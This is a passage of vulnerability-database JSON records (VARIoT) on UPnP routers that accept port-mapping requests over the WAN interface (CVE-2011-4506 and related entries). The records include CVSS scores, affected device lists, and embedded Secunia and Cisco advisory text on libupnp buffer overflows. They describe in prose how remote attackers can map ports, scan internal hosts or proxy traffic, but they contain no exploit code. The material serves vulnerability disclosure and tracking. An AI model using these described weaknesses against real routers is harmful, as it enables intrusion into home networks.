"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CARNEGIE MELLON",
"availabilityImpact": "COMPLETE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 9.4,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "NONE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 8.0,
"exploitability": "PROOF-OF-CONCEPT",
"exploitabilityScore": 10.0,
"id": "VU#357851",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "WORKAROUND",
"reportConfidence": "CONFIRMED",
"severity": "HIGH",
"targetDistribution": "NOT DEFINED",
"trust": 0.8,
"userInterationRequired": null,
"vector_string": "AV:N/AC:L/Au:N/C:N/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2011-4506",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-52451",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-4506",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#357851",
"trust": 0.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201111-368",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-52451",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "VULHUB",
"id": "VHN-52451"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003036"
},
{
"db": "NVD",
"id": "CVE-2011-4506"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-368"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The UPnP IGD implementation on the Thomson (aka Technicolor) TG585 with firmware 7.x before 7.4.3.2 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an \"external forwarding\" vulnerability. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Universal Plug and Play (UPnP) Multiple compatible routers have vulnerabilities with insufficient access restrictions. UPnP For supported routers, WAN Unintended from the side interface UPnP There is a vulnerability that allows the request to be accepted.An unauthenticated remote third party could obtain local network information or use the product as a proxy. Universal Plug and Play (UPnP) is a network protocol that is mostly used for personal computer device discovery and communication with other devices and the Internet. These requests can be used to connect to the internal host or proxy connection of the NAT firewall. Remote unauthenticated attackers can exploit vulnerabilities to scan internal hosts or communicate via the device proxy Internet. \nThe following devices are affected:\nCisco Linksys WRT54G firmware version prior to 4.30.5\nCisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1\nCisco Linksys WRT54GS v4 firmware versions prior to 1.06.1\nCisco Linksys WRT54GX firmware 2.00.05\nEdimax BR-6104K prior to 3.25\nEdimax 6114Wg\nCanyon-Tech CN-WF512 firmware version 1.83\nCanyon-Tech CN-WF514 firmware version 2.08\nSitecom WL-153 prior to firmware 1.39\nSitecom WL-111\nSweex LB000021 firmware version 3.15\nZyXEL P-330W\nSpeedTouch 5x6 firmware versions prior to 6.2.29\nThomson TG585 firmware versions prior to 7.4.3.2. 
A vulnerability exists in the UPnP IGD installation enablement in Thomson (also known as Technicolor) TG585 with firmware 7.x prior to firmware 7.4.3.2. This vulnerability is related to the \\\"external forwarding\\\" vulnerability. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. \nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nSiemens OZW / OZS Multiple Products libupnp Buffer Overflow\nVulnerabilities\n\nSECUNIA ADVISORY ID:\nSA52035\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/52035/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nRELEASE DATE:\n2013-01-31\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/52035/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/52035/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nMultiple vulnerabilities have been reported in multiple Siemens OZW\nand OZS products, which can be exploited by malicious people to\ncompromise a vulnerable device. \n\n1) Multiple vulnerabilities are caused due to a bundled version of\nlibupnp. 
\n\nFor more information:\nSA51949\n\n2) Multiple boundary errors within the \"unique_service_name()\"\nfunction (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests\ncan be exploited to cause stack-based buffer overflows. The vendor is planning\nto provide fixes with upcoming firmware updates. \n\nPROVIDED AND/OR DISCOVERED BY:\n2) Rapid7\n\nORIGINAL ADVISORY:\nSiemens SSA-963338:\nhttp://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf\n\nRapid7:\nhttps://community.rapid7.com/docs/DOC-2150\nhttps://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. 
\n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. This library is used in several vendor network\ndevices in addition to media streaming and file sharing applications. \nThese vulnerabilities were disclosed on January 29th, 2013 in a CERT\nVulnerability Note, VU#922681, which can be viewed at:\n\nhttp://www.kb.cert.org/vuls/id/922681\n\nCisco is currently evaluating products for possible exposure to these\nvulnerabilities. This advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+\nga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5\n=6sTu\n-----END PGP SIGNATURE-----\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4506"
},
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003036"
},
{
"db": "CNVD",
"id": "CNVD-2011-5064"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "VULHUB",
"id": "VHN-52451"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
}
],
"trust": 4.86
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851",
"trust": 5.8
},
{
"db": "NVD",
"id": "CVE-2011-4506",
"trust": 3.4
},
{
"db": "SIEMENS",
"id": "SSA-963338",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#922681",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003036",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201111-368",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2011-5064",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "18224",
"trust": 0.6
},
{
"db": "BID",
"id": "50810",
"trust": 0.3
},
{
"db": "SECUNIA",
"id": "52035",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-52451",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119949",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119896",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5064"
},
{
"db": "VULHUB",
"id": "VHN-52451"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003036"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4506"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-368"
}
]
},
"id": "VAR-201111-0162",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5064"
},
{
"db": "VULHUB",
"id": "VHN-52451"
}
],
"trust": 1.4788191
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5064"
}
]
},
"last_update_date": "2023-12-18T12:09:30.242000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.technicolorbroadbandpartner.com/index.php"
},
{
"title": "Patch for Multiple Routers UPnP WAN Interface Remote Unauthorized Access Vulnerability (CNVD-2011-5064)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/6022"
},
{
"title": "thomson-download",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=41851"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5064"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003036"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-368"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-16",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-52451"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003036"
},
{
"db": "NVD",
"id": "CVE-2011-4506"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 4.4,
"url": "http://www.kb.cert.org/vuls/id/357851"
},
{
"trust": 2.5,
"url": "http://toor.do/defcon-19-garcia-upnp-mapping-wp.pdf"
},
{
"trust": 1.6,
"url": "http://homekb.cisco.com/cisco2/ukp.aspx?vw=1\u0026articleid=28341"
},
{
"trust": 1.6,
"url": "http://jvn.jp/cert/jvnvu357851"
},
{
"trust": 1.1,
"url": "http://www.upnp-hacks.org/devices.html"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/docs/doc-2150"
},
{
"trust": 0.9,
"url": "http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf"
},
{
"trust": 0.8,
"url": "http://toor.do/upnp.html"
},
{
"trust": 0.8,
"url": "http://www.h-online.com/security/news/item/upnp-enabled-routers-allow-attacks-on-lans-1329727.html"
},
{
"trust": 0.8,
"url": "http://pupnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "https://community.rapid7.com/servlet/jiveservlet/download/2150-1-16596/securityflawsupnp.pdf"
},
{
"trust": 0.8,
"url": "http://www.rapid7.com/resources/free-security-software-downloads/universal-plug-and-play-jan-2013.jsp"
},
{
"trust": 0.8,
"url": "http://opentools.homeip.net/dev-tools-for-upnp"
},
{
"trust": 0.8,
"url": "http://upnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "http://www.dlink.com/us/en/technology/upnp"
},
{
"trust": 0.8,
"url": "http://jpn.nec.com/security-info/secinfo/nv13-003.html"
},
{
"trust": 0.8,
"url": "http://www.ipitomy.com/index.php/mi-security-notice-ip001"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4506"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4506"
},
{
"trust": 0.6,
"url": "http://www.kb.cert.org/vuls/id/357851http"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/18224"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/325/"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20130129-upnp"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/922681"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5064"
},
{
"db": "VULHUB",
"id": "VHN-52451"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003036"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4506"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-368"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5064"
},
{
"db": "VULHUB",
"id": "VHN-52451"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003036"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4506"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-368"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-10-05T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2013-01-29T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5064"
},
{
"date": "2011-11-22T00:00:00",
"db": "VULHUB",
"id": "VHN-52451"
},
{
"date": "2011-11-24T00:00:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003036"
},
{
"date": "2013-01-31T07:26:31",
"db": "PACKETSTORM",
"id": "119949"
},
{
"date": "2013-01-30T02:46:44",
"db": "PACKETSTORM",
"id": "119896"
},
{
"date": "2011-11-22T11:55:06.137000",
"db": "NVD",
"id": "CVE-2011-4506"
},
{
"date": "2011-11-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-368"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-30T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2014-07-30T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5064"
},
{
"date": "2012-03-08T00:00:00",
"db": "VULHUB",
"id": "VHN-52451"
},
{
"date": "2015-03-19T08:33:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003036"
},
{
"date": "2012-03-08T05:00:00",
"db": "NVD",
"id": "CVE-2011-4506"
},
{
"date": "2011-11-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-368"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-368"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "UPnP requests accepted over router WAN interfaces",
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "configuration error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-368"
}
],
"trust": 0.6
}
}
VAR-201111-0161
Vulnerability from variot - Updated: 2023-12-18 12:09
The UPnP IGD implementation on SpeedTouch 5x6 devices with firmware before 6.2.29 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Multiple Universal Plug and Play (UPnP) compatible routers have vulnerabilities caused by insufficient access restrictions. Universal Plug and Play (UPnP) is a network protocol that is mostly used for personal computer device discovery and communication with other devices and the Internet. These requests can be used to connect to internal hosts or to proxy connections through the NAT firewall. Remote unauthenticated attackers can exploit these vulnerabilities to scan internal hosts or to proxy Internet traffic through the device.
The following devices are affected:
Cisco Linksys WRT54G firmware version prior to 4.30.5
Cisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1
Cisco Linksys WRT54GS v4 firmware versions prior to 1.06.1
Cisco Linksys WRT54GX firmware 2.00.05
Edimax BR-6104K prior to 3.25
Edimax 6114Wg
Canyon-Tech CN-WF512 firmware version 1.83
Canyon-Tech CN-WF514 firmware version 2.08
Sitecom WL-153 prior to firmware 1.39
Sitecom WL-111
Sweex LB000021 firmware version 3.15
ZyXEL P-330W
SpeedTouch 5x6 firmware versions prior to 6.2.29
Thomson TG585 firmware versions prior to 7.4.3.2.
Speedtouch is a wireless Internet router for the home. This vulnerability is related to the "external forwarding" vulnerability.
----------------------------------------------------------------------
The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
TITLE: Siemens OZW / OZS Multiple Products libupnp Buffer Overflow Vulnerabilities
SECUNIA ADVISORY ID: SA52035
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52035/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
RELEASE DATE: 2013-01-31
DISCUSS ADVISORY: http://secunia.com/advisories/52035/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/52035/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Multiple vulnerabilities have been reported in multiple Siemens OZW and OZS products, which can be exploited by malicious people to compromise a vulnerable device.
1) Multiple vulnerabilities are caused due to a bundled version of libupnp.
For more information: SA51949
2) Multiple boundary errors within the "unique_service_name()" function (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests can be exploited to cause stack-based buffer overflows. The vendor is planning to provide fixes with upcoming firmware updates.
PROVIDED AND/OR DISCOVERED BY: 2) Rapid7
ORIGINAL ADVISORY: Siemens SSA-963338: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf
Rapid7: https://community.rapid7.com/docs/DOC-2150 https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
This library is used in several vendor network devices in addition to media streaming and file sharing applications. These vulnerabilities were disclosed on January 29th, 2013 in a CERT Vulnerability Note, VU#922681, which can be viewed at:
http://www.kb.cert.org/vuls/id/922681
Cisco is currently evaluating products for possible exposure to these vulnerabilities. This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)
iF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+ ga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5 =6sTu -----END PGP SIGNATURE-----
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201111-0161",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "speedtouch 5x6 router",
"scope": "lte",
"trust": 1.0,
"vendor": "alcatel",
"version": "6.2"
},
{
"model": "speedtouch 5x6 router",
"scope": "eq",
"trust": 1.0,
"vendor": "alcatel",
"version": "*"
},
{
"model": "br-6104k",
"scope": "eq",
"trust": 0.9,
"vendor": "edimax",
"version": "0"
},
{
"model": "6114wg",
"scope": "eq",
"trust": 0.9,
